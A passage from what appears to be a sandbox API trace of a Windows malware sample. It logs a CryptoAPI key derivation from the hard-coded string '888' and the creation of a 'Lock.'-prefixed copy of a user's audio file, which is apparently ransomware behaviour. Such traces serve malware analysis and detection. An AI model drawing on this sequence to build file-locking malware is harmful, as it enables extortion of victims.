lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.465] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f08 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.465] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.465] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0208.465] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.466] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77be8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa840 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa930 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8a0 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6e80 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa888 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.466] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.467] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaac8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.467] CharUpperBuffW (in: lpsz="A4E00B02826", cchLength=0xb | out: lpsz="A4E00B02826") returned 0xb [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.467] CharUpperBuffW (in: lpsz="SSA4E00B02826", cchLength=0xd | out: lpsz="SSA4E00B02826") returned 0xd [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.467] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa948 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.468] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0208.468] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0208.468] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0208.468] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.468] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.468] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0208.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x29f71e0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0208.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 21 [0208.468] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContextA", cchWideChar=21, lpMultiByteStr=0x29f71a0, cbMultiByte=21, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContextA", lpUsedDefaultChar=0x0) returned 21 [0208.469] CryptAcquireContextA (in: phProv=0x8cefd8, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x8cefd8*=0xa7c908) returned 1 [0208.469] CharUpperBuffW (in: lpsz="A0600D00A16", cchLength=0xb | out: lpsz="A0600D00A16") returned 0xb [0208.469] CharUpperBuffW (in: lpsz="SSA0600D00A16", cchLength=0xd | out: lpsz="SSA0600D00A16") returned 0xd [0208.469] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.469] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.469] CharUpperBuffW (in: lpsz="A2E00304E40", cchLength=0xb | out: lpsz="A2E00304E40") returned 0xb [0208.469] CharUpperBuffW (in: lpsz="SSA2E00304E40", cchLength=0xd | out: lpsz="SSA2E00304E40") returned 0xd [0208.471] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0208.471] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0208.471] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0208.471] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0208.471] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0208.471] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0208.471] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.471] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.471] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.471] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.471] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.471] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2aaac30, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0208.472] CryptCreateHash (in: hProv=0xa7c908, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a72778, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.472] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a728f8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0208.472] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.472] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aaae10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0208.472] CryptHashData (hHash=0x9e1eb8, pbData=0x2a72748, dwDataLen=0x3, dwFlags=0x1) returned 1 [0208.472] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.472] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.472] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0208.472] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0208.472] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0208.472] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aab080, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0208.473] CryptDeriveKey (in: hProv=0xa7c908, Algid=0x6601, hBaseData=0x9e1eb8, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9e2078) returned 1 [0208.473] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0208.473] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0208.473] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0208.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0208.473] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x29f7200, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0208.473] CryptDestroyHash (hHash=0x9e1eb8) returned 1 [0208.474] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music\\_qp6.wav" (normalized: "c:\\users\\fd1hvy\\music\\_qp6.wav"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x524 [0208.474] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.475] SetFilePointerEx (in: hFile=0x524, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f71e0 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaae0 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa8d0 | out: hHeap=0x2af0000) returned 1 [0208.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0208.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0208.475] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0208.475] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721e8 [0208.475] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721f8 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721f8 | out: hHeap=0x2af0000) returned 1 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa900 | out: hHeap=0x2af0000) returned 1 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaab0 | out: hHeap=0x2af0000) returned 1 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721e8 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a750d0 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa98 | out: hHeap=0x2af0000) returned 1 [0208.476] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music/" (normalized: "c:\\users\\fd1hvy\\music")) returned 0x11 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a750d0 | out: hHeap=0x2af0000) returned 1 [0208.476] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721e8 | out: hHeap=0x2af0000) returned 1 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb00 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10000) returned 0x2a8a138 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0208.476] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0208.476] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Music/Lock._qp6.wav" (normalized: "c:\\users\\fd1hvy\\music\\lock._qp6.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x510 [0208.477] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f70c0 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa80 | out: hHeap=0x2af0000) returned 1 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa50 | out: hHeap=0x2af0000) returned 1 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaaf8 | out: hHeap=0x2af0000) returned 1 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaa20 | out: hHeap=0x2af0000) returned 1 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0208.477] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa9a8 | out: hHeap=0x2af0000) returned 1 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa960 | out: hHeap=0x2af0000) returned 1 [0208.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0208.478] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ebc0 [0208.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0208.478] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ebc0 | out: hHeap=0x2af0000) returned 1 [0208.478] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 